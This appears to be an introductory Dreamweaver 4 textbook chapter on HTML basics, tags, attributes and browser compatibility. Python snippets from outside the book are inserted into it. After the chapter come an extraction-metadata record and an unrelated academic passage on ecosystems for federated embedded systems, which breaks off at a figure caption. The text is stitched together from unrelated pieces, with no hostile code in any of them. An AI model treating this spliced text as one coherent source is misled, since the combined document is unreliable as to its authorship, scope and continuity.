Module 1 Fundamentals of the World Wide Web The Goals of this Module - Understand basic Internet terms - Gain an overview of how web pages are built using HTML - Learn basic HTML tags and attributes - Investigate how different browsers interpret web pages - Understand how Dreamweaver 4 generates HTML It seems like the Internet is completely inescapable these days. Everywhere you turn, you see another advertisement for the latest web site or service or another story about someone making (or losing) millions of dollars on their hot Internet idea. For many people, using the Internet has become as common as using the telephone. In fact, entirely new terms have been coined that today seem completely familiar to most people, such as dot coms, surfing the Net, e-business—the list goes on and on. But how many people know what the Internet is really all about, such as how it works, how web pages are accessed, and how sounds and animations get created and placed so that we can get to them? At its heart, this book is all about how those things happen—from designing web pages, to creating and inserting pictures and graphics, to crafting sophisticated animations that move and react to our commands. By following along with the exercises in this book, you'll soon be creating dynamic web pages with original graphics, like the one shown in Figure 1-1. But to do those things, you first need to know how they work. Understanding the Web—Basic Internet Terminologies With the Internet seemingly everywhere, it’s hard to believe that the Net as we know it has been around less than ten years. While the basic structure of the Internet was created during the 1960s and 1970s, when scientists who needed a way to share their research created an interconnected network of computers, the modern Internet wasn’t born until the arrival of the first software program that allowed the average consumer to look at pages that included colors and pictures, and to move to another page by clicking a link with their mouse. A software program with those capabilities is known as a web browser. The first popular graphical web browser was created by a group of graduate students led by Marc Andreessen and Eric Bina at the University of Illinois. Called Mosaic for X, it was first released in 1993. Marc Andreessen went on to start Netscape Corporation, and his revised browser became the cornerstone of our modern online experience. The Netscape browser is still with us, of course, and it’s been joined by browser programs created by Microsoft (Internet Explorer) and by other browsers as well. All browsers have the same basic functions: to read a set of instructions, or code, that directs our computers to display text and pictures, enable us to get files from another computer (download), or send information to a computer Module 1: Fundamentals of the World Wide Web The exercises in this book will soon have you creating your own unique web pages for publication to the Web. (upload) and receive a response. While that seems pretty simple, in the short history of the Internet, the capabilities of browsers have expanded many times over, and today you not only can see a simple picture displayed at the top of a web page with some text below it, but also can track an airplane in flight, make reservations for a movie at the cinema, or chat with people all over the world. Yet even though the Internet has become incredibly sophisticated, the basic function of every web page you see is controlled by the code that is read by the browsers on our computers. 
What Is HTML? This basic code for the design of Web pages is called Hypertext Markup Language (HTML), and it is the foundation of every web page on the Web. The next section of this module takes a closer look at HTML. Notice what the code actually does, though. It gives directions to your computer to perform certain actions, such as display text or images, format the page in a particular layout, and insert objects that you can interact with. As a new web designer, this is one of the first lessons that you have to learn. Most of the actual work is done at the user’s (or client’s) computer. Something you’ll hear over and over again is that you need to design your pages for the user’s, or viewer’s, experience, and that includes considering the fact that their computers control how the page is displayed for them. Your job is to provide pages that neither get bogged down with long download times nor consume so much of the users’ computer resources that they leave your page out of frustration. And, of course, you need pages that attract viewers because the content is something they want to see. Thankfully, the technical challenge of designing quick-loading web pages is much easier to address when working with programs like Dreamweaver and Fireworks, because managing and optimizing your pages and files is the primary function of these programs. Getting Connected What happens after you log on to your Internet Service Provider (ISP), the company that provides your connection to the Internet? Your computer takes the first action when the browser that you’re using transmits a request to a remote computer to show you your initial web page. That remote computer—known as a server—is the place where all the files are stored that are necessary for your starting page to display properly. In fact, as you’ll see when HTML is discussed later in the chapter, web pages are not like printed pages at all. That is, the images and other information on the page are not one object, like a page in a magazine. Instead, the page contains code that tells the browser to retrieve and display those images, as shown in Figure 1-2. The browser’s job is to bring the images all together and display them for you, which is why your pages don’t always load all at once, but tend to display the text first and then the images as they are received from the server. Your home page and every other web page on the Internet have some basic things in common. The page is part of a web site—a collection of web pages, files, and links all associated with a particular domain name. These domain names are purchased by companies or individuals (such as www.amazon.com, www.yahoo.com, and www.msnbc.com), registered to nonprofit groups (such as www.pbs.org and www.splc.org), or assigned to government agencies or educational institutions (www.whitehouse.gov, www.stetson.edu, and www.firm.edu, for example) as a way to identify them as unique locations on Module 1: Fundamentals of the World Wide Web the World Wide Web (or simply the Web), the collection of servers that store the files of the web sites. The most common current domain suffixes (the three-letter code after the dot) are provided in Table 1-1. Seem confusing? It’s really not. Just as you have a unique address for your home, each web site needs a unique address so that it can be found. Depending on your browser, this address may be shown in the Location bar (Netscape) or the Address bar (Internet Explorer). 
Either way, it means the same thing: it identifies to the server exactly where the files you are requesting can be found. Those addresses are called universal resource locators (URLs). As you’ll see when you start working with Dreamweaver, web site managers (or webmasters) have a lot to do with keeping the files and all the supporting <table> <thead> <tr> <th>Domain Suffix</th> <th>Domain Type</th> </tr> </thead> <tbody> <tr> <td>.com</td> <td>Commercial, for-profit web site</td> </tr> <tr> <td>.org</td> <td>Nonprofit organization</td> </tr> <tr> <td>.gov</td> <td>Government agency</td> </tr> <tr> <td>.net</td> <td>Internet service provider</td> </tr> <tr> <td>.mil</td> <td>Military</td> </tr> <tr> <td>.edu</td> <td>Educational institution</td> </tr> <tr> <td>.k12</td> <td>Kindergarten through high school</td> </tr> </tbody> </table> Table 1-1 Common Domain Names on the World Wide Web assets of their web pages organized and in proper working order. As a client of a browser program, all you really care about is getting the page to load quickly and properly and getting to the information you want to see. Do you remember the first time you used the Internet? You probably were fascinated by how easy it was to move from one page to another, all with the click of a mouse. It’s no accident that the term “web surfing” was coined as a way to describe the experience of moving effortlessly from page to page. What makes all that possible? Again, it’s all controlled by the instructions written into the code. One of the things that makes HTML so valuable is its ability to insert links (or hyperlinks) in each page. In the same way that HTML allows a browser to display images, it can also create instructions to go to another web page or another section of a page when the user clicks their mouse on an image or string of text. Without this ability, web pages would be static, immovable objects—far different from the dynamic and interactive experience of the Web today. In a nutshell, the Internet is simply (simply!) a huge worldwide interconnected network of computers, all using a common language, that allows users to retrieve information stored on remote computers, and display it on their computers at home, work, or school. This is all done through the magic of a programming language, HTML, that lets web page designers insert images, text, sounds, and other objects into their pages, through the browser programs that read the instructions in the code and display the results on the user’s computer. Hmmm. When stated that way, it doesn’t seem hard at all, does it? And, as you’ll see in the next section, gaining a basic understanding of HTML isn’t all that difficult either! 1-Minute Drill - What is the basic function of a web browser? - Define the term web site. Getting a Handle on HTML Just saying the words “programming language” to some people can cause their eyes to glaze over and their senses to go numb. Other people are fascinated by the challenges presented by learning to program computers and by sorting out all the instructions necessary to get a computer to perform the way they want it to. Whether you’re a natural programmer or not, however, you need a basic understanding of HTML to go very far as a web designer. 
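The request-and-response exchange described above (a browser asks the server named in a URL for a document and receives HTML code to interpret) can also be seen directly from a few lines of code. This is purely an illustration and not one of the book's exercises; the address used is the reserved example.com domain.

```python
# A browser's first job, stripped to its essentials: request the document
# named by a URL and receive the HTML code that describes the page.
from urllib.request import urlopen

with urlopen("http://www.example.com/") as response:
    print(response.status)                 # 200 means the server found the page
    html = response.read().decode("utf-8", errors="replace")

print(html[:120])                          # start of the code a browser would interpret
```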
Although Dreamweaver (and Fireworks, as you’ll see) will certainly do the majority of the programming for you, by gaining an understanding of what’s going on under the hood of your web page, you’ll have a better chance of tracking down problems and getting them corrected when something isn’t working just right. You’ll also see as you work with Dreamweaver that you can save yourself a lot of work by going directly to the point on your page where you want to do something. To do that, you need to know about tags. **HTML Tags** You'll start by looking at what a page displayed in its raw HTML state looks like. If you haven’t done so yet, download and unzip the files located in module_one.zip at www.osborne.com. After you unzip the files, use your browser to open the file called html_one.htm. After your browser displays the page, select on View | Page Source (for Netscape), or View Source (for Internet Explorer). You should see something like this: ```html <html> <head> <title></title> </head> <body>This is a very simple web page. </body> </html> ``` while your browser displays this: ``` This is a very simple web page. ``` So what’s going on here anyway? Why did it take so much code to display one little sentence? And what’s with all of those left and right arrow brackets in the code? Let’s take a look at that string of code and decipher it. **Hint** You’ll notice that the filenames throughout the book use the underscore symbol ( _ ) to separate words. Although modern computer operating systems can easily deal with filenames that have spaces in them, not all servers operate correctly when they come across a space. For that reason, you won’t see any spaces in exercise filenames or in files that you’ll create. The first thing to understand about HTML is that it is written in a series of commands known as *tags*. Tags are the commands written by the programmer (or by Dreamweaver or another web authoring program) that tell the browser what to do. Take a look at the tags in the preceding example: ```html <html> <head> <title></title> </head> <body>This is a very simple web page.</body> </html> ``` Notice first of all that all the tags are written as pairs, just as parentheses are always written in pairs (like this). And, just as you need opening and closing parentheses, an opening tag and a closing tag are almost always necessary. Every web page begins and ends with the `<html>` tag. This lets the browser know that it must process the page as an HTML or web document instead of, say, a word processor document or an image file. The brackets are there to let the browser know that a tag is enclosed and that certain actions are expected. Finally, notice that the final (closing) `</html>` tag adds a forward slash inside the left arrow bracket, which lets the browser know that it should stop processing, or close, that tag. Next, you see the `<head>` tag and, enclosed within it, the `<title>` tag. The `<head>` tag tells the browser that the information inside it goes at the top, or head, of the document, and the `<title>` tag is where the information about the title of the web page is displayed. In the first example, your browser calls this an “Untitled Document” because no information is enclosed by the `<title>` tag. Now, open the file called html_two.htm from the exercise files and you’ll see that a title has been added to the page. Viewing the source of the page reveals that more information has been added to the HTML in the example page—the words “A Simple Web Page” enclosed by the <title> tags. 
```html
<html>
<head>
<title>A Simple Web Page</title>
</head>
<body>This is a very simple web page.
</body>
</html>
```

**HTML Attributes**

Take a look at another example. Open html_three.htm in your browser and look at its source, shown here:

```html
<html>
<head>
<title>A Simple Web Page</title>
</head>
<body bgcolor="#CCFFCC">
<div align="center">This is a very simple web page.</div>
</body>
</html>
```

Notice that one new tag, the <div> tag, was added. But something else has been added—another set of instructions inside the left and right bracket arrows that enclose the tags. Did you notice the difference when you first opened the practice file? The page background is now pale green and the text has been centered on the page. If you look at the code, you can probably guess that bgcolor="#CCFFCC" is the code that makes the background color that shade of green. And if you look closely at the command inside the <div> tag, you see the added instruction align="center". These added instructions are known as **attributes**, and they are used to do things such as change the color of text; change the alignment of text, paragraphs, and images; change the background color; or insert an image in the background of the page. As Wendy Willard describes in her excellent book, *HTML: A Beginner’s Guide* (Osborne/McGraw-Hill, 2001), you can think of the tags in a web page as the ice cream in an ice cream sundae, while the attributes are all the toppings. Tags provide structure and organization to your pages, while attributes make them tastier! Take a look at another example. Open html_four.htm in your browser. You can see a number of attributes at work here. The text has been changed quite a bit—different colors have been added, sizes have been changed, and bold and italic styles have been added. Also, a background image has been added to the page, and the final result is as you see in Figure 1-3. The source code reveals that what’s really been done is that a number of tags have been changed by inserting attributes within them. The attributes in the source code are underlined so that you can locate them more easily. You’ll quickly notice that while the way HTML works isn’t really all that complicated, by the time you look at the code for a complex page, you might have trouble seeing the forest for the trees. Don’t worry! Dreamweaver is going to make this all much simpler for you.

```html
<html>
<head>
<title>A Simple Web Page</title>
</head>
<body background="grayparchment.gif">
<div align="center">
<p><font color="#0000FF" size="7">This</font> <font color="#0000FF" size="5">is a <font color="#FF0000">very</font> <b>simple</b> <i>Web</i> <font size="7">page</font>.</font></p>
<p><img src="images/simpleimage.gif" width="299" height="122"></p>
<p><a href="http://www.osborne.com">Visit Osborne Publishing.</a></p>
</div>
</body>
</html>
```

What do you notice about the way the attributes are written? If you look closely, you’ll see that they all have a few things in common:

- Attributes are always placed inside the opening tag (between its left and right brackets) of the element they modify.
- The command for the attribute (color means we want to change the color, for instance) comes before an equal sign. Every attribute needs that equal sign!
- The value of the attribute comes after the equal sign and contains the information you want applied.

You also see two attributes that control the images displayed in your page. The first is background, and the second is src.
One very important note about images: Your code has to tell the browser not only what the image is—its name and size—but also where the image is. Notice that the background attribute is different from the src attribute. It only lists the name of the file that is used for the background on your page, because the image is in the same folder as the HTML file itself: ```html <body background="grayparchment.gif"> ``` Because no other information is provided, the browser assumes that this image can be found in the same location as the HTML file itself. --- **Figure 1-3** The results of the HTML code in html_four **Hint** A quick note about colors. On the preceding example web page, the word “This” is blue. Why does the attribute for that word list it as “#0000FF”? Couldn’t you just type `blue` instead? Actually, you could, and you’d get the same color. But what if you wanted a grayish-green blue color? To get more-specific colors, you need more-specific instructions, so when that first consumer browser was developed by Netscape, a way had to be developed to display a variety of colors—all on different computers that might have different settings. For that reason, a list of 216 “Web safe” colors was developed, written in a type of code called *hexadecimal*. This code uses letters and numbers to specify exactly which colors are to be displayed by your browser. Color is discussed in more detail in Module 4. Notice that the background attribute is different from the src attribute. It only lists the name of the file that is used for the background on your page, because the image is in the same folder as the HTML file itself: Now, look at the SRC code: ```html <p><img src="images/simpleimage.gif" width="299" height="122"> </p> ``` Notice that “images/” comes before the filename. In this case, your image is in a different folder (named images) than the source code, and you have to give the browser more specific information on where to find it. As you’ll see in the next module, it’s very important to plan the layout of your site so that you can easily find and file the pictures and other resources you want to use. Otherwise, you might end up with the dreaded (and unprofessional) broken image link symbol on your otherwise beautiful web page. The last attribute to discuss is the `<a href>` combination that you see near the bottom of the sample code. This is the place where you can insert a link into your page. Again, notice how it comes before the words it modifies (Visit Osborne Publishing) and that it is very specific in nature. While it’s getting increasingly common for users to just type a few words into the location bar of their browser and zoom off to a website, when you insert a hyperlink, you need all the information included, including the information that specifies you want your files transported using a process known as Hypertext Transfer Protocol (http://)—the web protocol for linking one page with another. **Hint** The hyperlink in our sample is called an *absolute* link because it is outside the website you’re currently in. Absolute links always require the entire URL. *Relative* links, or those within your own site, can be linked by filename, as you’ll see in Module 5. One other type of tag that hasn’t been discussed yet is known as a *metatag*—a specialized tag that is located within the head of pages and that provides hidden information about the page, its author, and its contents. 
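Two details from this discussion can be checked with a few lines of standard-library Python: how a relative reference such as images/simpleimage.gif is resolved against the location of the page that uses it, and how a hexadecimal value such as #0000FF breaks down into red, green, and blue components. The page URL below is made up for the example.

```python
from urllib.parse import urljoin

page = "http://www.example.com/tutorial/html_four.htm"   # made-up page location

# src="images/simpleimage.gif" is a relative reference: the browser resolves
# it against the folder that holds the HTML file itself.
print(urljoin(page, "images/simpleimage.gif"))
# http://www.example.com/tutorial/images/simpleimage.gif

# An absolute link carries the full URL, so resolving it changes nothing.
print(urljoin(page, "http://www.osborne.com"))
# http://www.osborne.com

# "#0000FF" is hexadecimal: two digits each for red, green, and blue (0-255).
color = "#0000FF"
r, g, b = (int(color[i:i + 2], 16) for i in (1, 3, 5))
print(r, g, b)   # 0 0 255 -> pure blue
```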
You’ll see when working with Dreamweaver that this is one of the ways that you can be sure you get visitors to your web pages, because the information inside your metatags is often what search engines actually search for. Right now, you just need to know that HTML has that capability. And, of course, HTML has many other capabilities as well, but for right now, understanding how tags and attributes work in combination with each other is all you actually need to know about HTML. Table 1-2 lists the most common tags that you’re likely to see when working with Dreamweaver. Module 1: Fundamentals of the World Wide Web **Tag** - `<a href="URL">`: Creates a hyperlink to the specified URL - `<b>`: Bolds text - `<blockquote>`: Indents text left and right - `<body>`: Defines the visible portion of the web page - `<br>`: Creates a line break - `<font>`: Describes the font (text style) to be used - `<form>`: Creates a form - `<frame>`: Defines a single part of a framed web page - `<frameset>`: Defines a set of frames in a web page - `<h1>`: The largest headline-styled text - `<h6>`: The smallest headline-styled text - `<head>`: Defines information and instructions that do not appear on the page itself - `<html>`: Defines the file as an HTML document - `<hr>`: Inserts a horizontal line (rule) - `<i>`: Creates italic text - `<img>`: Inserts an image - `<ol>`: Creates a numbered (ordered) list - `<p>`: Formats a block of text as a separate paragraph - `<table>`: Creates a table - `<td>`: Defines table divisions—separate cells in a table - `<th>`: Creates a header for a table - `<title>`: Describes the text to be displayed in the browser title bar - `<tr>`: Defines table rows **Attributes** - `<body background="imagename">`: Sets the image to be used as a page background - `<body bgcolor=?>`: Sets the page background color - `<body text=?>`: Sets text color in the body of a page - `<div align=?>`: Used to format blocks of text - `<font color=?>`: Sets the color of text - `<font size=?>`: Sets the size of text - `<table border=?>`: Sets the width of the border around a table - `<table width=# or %>`: Sets the width of a table as an absolute number of pixels or as a percentage of the page - `<tr align=?>`: Sets alignment of individual cells **Table 1-2** Basic HTML Tags and Attributes 1-Minute Drill - Describe the function of HTML tags. - Describe the function of HTML attributes. - What two items of information must be included when inserting an image in a web page? The Present and Future of HTML The development of the Internet has happened in an amazingly short period of time. Along with this rapid development, an incredibly competitive marketplace has developed in which those who develop the latest and greatest Internet capabilities for their browsers can quickly overtake and dominate their competitors. The problem is that one browser may not display code written for another flavor of browser, and visa versa. HTML standards quickly became an issue of great concern to developers worldwide as growing differences in browser technologies indicated that entire web sites soon would need to be developed for each browser platform. The World Wide Web Consortium (W3C, at www.w3c.org) was formed as a means of addressing these growing problems. The W3C is the organization responsible for ensuring that a common set of HTML standards is developed and maintained, and that the capabilities of those standards are widely available to webmasters. 
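The tag-and-attribute structure summarized in Table 1-2 is exactly what a parser sees when it reads a page's source. The short sketch below uses Python's standard html.parser module to list the tags and attributes in a small sample document; it is an illustration only and not one of the book's exercises.

```python
from html.parser import HTMLParser

class TagLister(HTMLParser):
    """Print each opening tag and its attributes as they are encountered,
    roughly what you do by eye when viewing a page's source."""
    def handle_starttag(self, tag, attrs):
        print(tag, dict(attrs))

sample = """
<html><head><title>A Simple Web Page</title></head>
<body bgcolor="#CCFFCC">
  <div align="center">
    <a href="http://www.osborne.com">Visit Osborne Publishing.</a>
    <img src="images/simpleimage.gif" width="299" height="122">
  </div>
</body></html>
"""

TagLister().feed(sample)
# html {}
# head {}
# title {}
# body {'bgcolor': '#CCFFCC'}
# div {'align': 'center'}
# a {'href': 'http://www.osborne.com'}
# img {'src': 'images/simpleimage.gif', 'width': '299', 'height': '122'}
```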
So, with a common set of standards, developers should have no problems at all, right? Unfortunately, that isn’t the case. Remember that the work of displaying your pages is done at the viewer’s computer and by the browser they have installed. Currently, all browsers handle the HTML standards developed by the W3C through version 2—but, as of this writing, the W3C has developed standards through version 4.01! Furthermore, neither Netscape Navigator nor Internet Explorer, even in their latest versions, supports all the tags in HTML 4.01, or they interpret the code differently. This can cause web authors and developers real headaches as they try to construct pages that will display properly no matter what type of browser is being used. As you’ll see in Module 2, the result of all this is that you need to have a very good understanding of who will be viewing your pages, what kind of browser they are likely to have, and how this impacts the features you want to make available through your code. Module 1: Fundamentals of the World Wide Web As a sophisticated web authoring tool, Dreamweaver 4 includes ways to address browser compatibility. These compatibility problems are discussed throughout this book, and you'll quickly come to appreciate the variety of ways in which Dreamweaver enables you to test your project. **Hint** To check for browser compatibility, you need to install at least the two most common browser programs—Netscape Navigator and Internet Explorer. They can be downloaded at www.netscape.com and www.microsoft.com, respectively. What You See Is What You Get After you understand the basics of what HTML does and how it interacts with your browser, it won't be nearly as intimidating. In fact, in the early days of the Internet, almost all web pages were created by hand—that is, raw code was written in its HTML text form. Many of these early pioneers taught themselves how to do their coding by carefully studying the code they saw on web pages and emulating (okay, sometimes copying) it. To this day, plenty of hard-core HTML junkies won't build their web pages any other way. For the rest of us, those who see a huge page with streams of hard-to-follow commands and quickly feel overwhelmed, Dreamweaver offers the ability to design pages in a much friendlier environment, one that enables you to actually see what's going to be on your page as you work. Dreamweaver enables you to design in an almost real-time environment, and is the best software available for those who want to work in this what you see is what you get (WYSIWYG) mode. With Dreamweaver, you can apply elements to your pages, change the text size and style, insert images, and control the overall look of your pages without ever looking at HTML at all. In addition, Dreamweaver provides clean, standards-driven, code that can easily be modified in its raw code directly within the program. Version 4 has even added the capability of viewing two simultaneous windows, displaying the design version of the page in one window, while the code itself is displayed (and automatically updated) in its pure form, as shown in Figure 1-4. Dreamweaver calls this “round-trip” HTML because page authors can switch seamlessly between a code view and a design view without worrying about the program creating code that is not compatible with current standards. 
This may not seem important to you right now, but at some point in the process of becoming an accomplished web author and site developer, you're going to want to have access to options that are more easily created and modified in “raw” HTML. For the new author, or even someone who has previously done their entire HTML coding by hand, Dreamweaver also provides some other useful coding help: - Automatically corrects overlapping and redundant tags and attributes - Highlights incorrect code and code that is not supported by current standards - Includes a comprehensive reference for HTML, JavaScript, and cascading style sheets (CSS) ### 1-Minute Drill - What organization maintains and establishes standards for HTML? - Describe how browser compatibility issues can impact web design. - The World Wide Web Consortium maintains and establishes the HTML standards. - Tags and attributes can be read and interpreted (or not read at all) by different browsers or even different versions of the same browser. Module 1: Fundamentals of the World Wide Web Project 1-1: Viewing Source Code Many web authors got their start in web design by doing something very simple—they looked at the code contained in other web pages through the View command in their browser. You can also learn a great deal about HTML and how tags and attributes are employed by examining the source code of web pages. You’ll start by looking at one of the world’s most popular sites, Yahoo! (www.yahoo.com). Yahoo! is an example of an Internet directory—specially constructed web pages filled with links to other sites listed by category. You can almost think of it as Yellow Pages for the Web. This section looks at both the page itself and the underlying code. Step-by-Step 1. Open Yahoo! in your browser and you’ll see a very tightly organized page with a huge number of hyperlinks, shown in Figure 1-5. 2. Choose View | Page Source (Netscape) or Source (Internet Explorer), and you’ll see the HTML code for that page, as shown in Figure 1-6. 3. Now identify some of the tags you see: - What tag do you find most often on this page? - What is the page title? - Does the page use tables to lay out its content? What tells the browser to develop the tables? - Do you see any tags you don’t recognize? Note Yahoo! uses a number of special HTML tags called cascading style sheets. These special formatting tags will be discussed in Module 8. 4. Next, visit a few of the following web sites: - www.osborne.com - www.nbci.com - www.microsoft.com - www.apple.com - www.zdnet.com On each of the sites, do the following: a. Locate the code for an image that is on the page. What is the name of the image? Is the image in the same folder as the main page? If it’s in another folder, can you identify the name of the folder that holds it? b. Try and locate special text attributes on the page. Do you find instances of the bold or italic tags? How about tags for text color? c. Notice how tables are used in the construction of the page. Can you identify the attributes that define the table and its contents? Figure 1-5 Yahoo! is one of the world’s most visited web sites Figure 1-6 Viewing the code for the Yahoo! home page Module 1: Fundamentals of the World Wide Web d. Look for tags and attributes listed on these pages that haven’t been discussed yet. Can you tell what they do? e. Look for a tag that is formatted like this: <!--some text in here-->. What do you think the purpose is of this kind of tag? f. 
Look at the exact same web site using both Internet Explorer and Netscape Navigator. Do you see any difference in how the two browsers display the page you’re viewing? What to Take Away Understanding HTML and how web pages are created is not an overwhelming chore. Just like with any craft, designing web pages requires patience and lots of practice. If you’re willing to put the time into learning the software, and then practice your skills using the projects in this book, you’ll find that within a very short time, you will be confidently building web pages and assembling them into well-defined web sites. It’s going to be a lot of fun—and you’ll get started in the next chapter by looking at web site planning and how you use Dreamweaver to build your site from the ground up. Mastery Check 1. What is the term to describe a web page’s address on the Internet? 2. Every web page begins and ends with what tag? 3. What is the function of this tag: <a href=“http://www.osborne.com”>? 4. What is the term used by Dreamweaver to describe its standards-based HTML code? 5. What is the difference between a relative link and an absolute link?
{"Source-Url": "http://books.mhprofessional.com/downloads/products/0072192607/0072192607_ch01.pdf", "len_cl100k_base": 7209, "olmocr-version": "0.1.49", "pdf-total-pages": 19, "total-fallback-pages": 0, "total-input-tokens": 38593, "total-output-tokens": 7972, "length": "2e12", "weborganizer": {"__label__adult": 0.0004360675811767578, "__label__art_design": 0.00618743896484375, "__label__crime_law": 0.0002639293670654297, "__label__education_jobs": 0.0282135009765625, "__label__entertainment": 0.0004227161407470703, "__label__fashion_beauty": 0.0003151893615722656, "__label__finance_business": 0.0008873939514160156, "__label__food_dining": 0.0004818439483642578, "__label__games": 0.0011386871337890625, "__label__hardware": 0.0013036727905273438, "__label__health": 0.0003097057342529297, "__label__history": 0.0005779266357421875, "__label__home_hobbies": 0.000438690185546875, "__label__industrial": 0.00037550926208496094, "__label__literature": 0.0014209747314453125, "__label__politics": 0.00014638900756835938, "__label__religion": 0.0009479522705078124, "__label__science_tech": 0.01416015625, "__label__social_life": 0.00024628639221191406, "__label__software": 0.218505859375, "__label__software_dev": 0.72216796875, "__label__sports_fitness": 0.00023472309112548828, "__label__transportation": 0.0003859996795654297, "__label__travel": 0.0005259513854980469}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 32453, 0.00548]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 32453, 0.82598]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 32453, 0.92297]], "google_gemma-3-12b-it_contains_pii": [[0, 305, false], [305, 2824, null], [2824, 3781, null], [3781, 6511, null], [6511, 7992, null], [7992, 10147, null], [10147, 11499, null], [11499, 13709, null], [13709, 15478, null], [15478, 17620, null], [17620, 19123, null], [19123, 21510, null], [21510, 23245, null], [23245, 25423, null], [25423, 28019, null], [28019, 28788, null], [28788, 30619, null], [30619, 31011, null], [31011, 32453, null]], "google_gemma-3-12b-it_is_public_document": [[0, 305, true], [305, 2824, null], [2824, 3781, null], [3781, 6511, null], [6511, 7992, null], [7992, 10147, null], [10147, 11499, null], [11499, 13709, null], [13709, 15478, null], [15478, 17620, null], [17620, 19123, null], [19123, 21510, null], [21510, 23245, null], [23245, 25423, null], [25423, 28019, null], [28019, 28788, null], [28788, 30619, null], [30619, 31011, null], [31011, 32453, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 32453, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 32453, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 32453, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 32453, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 32453, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 32453, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 32453, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 32453, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 32453, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, true], [5000, 32453, null]], "pdf_page_numbers": [[0, 305, 1], [305, 2824, 2], [2824, 3781, 
3], [3781, 6511, 4], [6511, 7992, 5], [7992, 10147, 6], [10147, 11499, 7], [11499, 13709, 8], [13709, 15478, 9], [15478, 17620, 10], [17620, 19123, 11], [19123, 21510, 12], [21510, 23245, 13], [23245, 25423, 14], [25423, 28019, 15], [28019, 28788, 16], [28788, 30619, 17], [30619, 31011, 18], [31011, 32453, 19]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 32453, 0.03462]]}
olmocr_science_pdfs
2024-11-26
2024-11-26
076d89ca3016be1cfe718a4376030adee1e4c973
ABSTRACT This paper discusses how Systems of Systems (SoS) can be constructed by linking together embedded computers in constituent systems to create complex but more flexible and adaptable systems. This approach to software system development is called Federated Embedded Systems (FES), and the ecosystem of players that evolves around such systems is presented, with the aim of ensuring quality in engineering SoS. Ecosystems for Federated Embedded Systems (EcoFES) comprise a new area of research that scales component-based software development for embedded software into new dimensions. The proposed ecosystem dimension introduces an open, flexible and adaptable SoS architecture for improving the process of FES development. In the paper, we identify some architectural challenges and discuss the implications of scaling from a closed ecosystem to an open one that provides open collaboration and innovation in the context of FES. Categories and Subject Descriptors D.2.11 [Software Architectures]: Domain-specific architectures. General Terms Management, Performance, Design, Economics, Reliability. Keywords 1. INTRODUCTION The challenge of developing Systems of Systems (SoS) has received increased attention from industry and the research community in recent years. SoS development is the process of combining dedicated complex systems for a specific target, i.e., developing high-quality complex systems in a rapid and efficient way. SoS are typically composed of software systems that are discovered, selected and composed at runtime. Each constituent system has value on its own, even when used outside the SoS, may change over time, and may be independently deployed and delivered by different providers. Software ecosystems provide a complementary, organisational view of SoS development that introduces roles and rules of interaction, collaboration and synergistic capabilities for the constituent systems [5]. This view requires explicit modelling of the roles in different organisations and of the rules that govern their internal and external interactions, for instance when an organisation collaborates with independent third-party organisations. Such ecosystems aim to offer added functionality, innovation, flexibility, openness, and adaptability through orchestrations and choreographies of multiple heterogeneous systems, as well as increased productivity and efficiency in development. Embedded systems (ES) are key components in many everyday systems, including automotive [3], home automation, energy, transportation, healthcare, and manufacturing [8]. External connectivity introduces a new dimension of technical challenges for ES manufacturers, as products become explicit configurations of subsystems developed by independent providers. As a consequence, these providers must introduce support and coordination for connected services in their product lines, while contributing to satisfying ES-specific constraints at the SoS level, such as real-time behaviour, limited resources and additional pre-defined platform technologies. The ES industry exemplifies a relatively closed market in which a direct chain exists only between suppliers and manufacturers. Recent works discuss how players could benefit if their ecosystems, including their development organisations, processes and software assets, were more open [1, 3].
However, the business decision of a closed market to move towards open ecosystems, thus changing the overall structure and infrastructure of the industry, has a considerable impact on the related organisations' structure, processes and software assets. These effects, especially in the complex intersection of SoS and ecosystems, have not been analysed thoroughly in any previous work. An example in the automobile industry is the software standard AUTOSAR, which is a component-based framework that only allows flexibility at design time. Recent research [1] opens up this model to allow the addition of plug-in software, allowing third-party add-on developers, through certain interfaces, to access sensors and actuators. In this way, a SoS can be constructed by adding plug-in software to ES configurations that, together with a base system, realise critical SoS functions. We refer to this class of system of embedded systems as Federated Embedded Systems (FES). The notion is closely related to Cyber-Physical Systems (CPS), consisting of networked systems relying on physical processes, computation and communication technologies to extend the capabilities of physical systems. The contribution of this paper is an analysis of Ecosystems for Federated Embedded Systems (EcoFES), which carries several novel challenges that motivate special consideration. We pinpoint a number of challenges on the organisational, technical, and business architecture level. The identified challenges are primarily related to the ecosystems' processes, methods, and tools. The organisation of the remainder of the paper is as follows. Section 2 describes the EcoFES concept, the motivation and its main benefits in detail. Section 3 describes the architectural challenges. Section 4 summarises related work. Finally, Section 5 describes on-going and future work and discusses our conclusions.
2. THE ECOFES CONCEPT
The EcoFES roles and various layers are shown in Figure 1. It involves a combination of players (individuals and organisations) which make use of or offer synergistic capabilities from a business, services and components perspective. The proposed structure promotes openness through collaboration, flexibility, innovation and adaptability for ES development, through the formation of federations. In order to best support collaborative development scenarios in the ecosystem, the identification of roles, strategies, processes, and resources needs to be studied and orchestrated so that they co-evolve [9]. The EcoFES players (i.e., supplier, developer, end-user and manufacturer) will require a technical infrastructure to enable the formation and operation of these federations. For instance, end-users may use services that are provided by the manufacturer or may find the services offered by another player (e.g., a third-party developer or supplier) more attractive. In other scenarios, developers use internal or external APIs, frameworks, or Web services provided to the federation. This exemplifies that third parties may provide new or refined business processes, services or components to the ecosystem.
![Figure 1. EcoFES Conceptualisation Schema.](image)
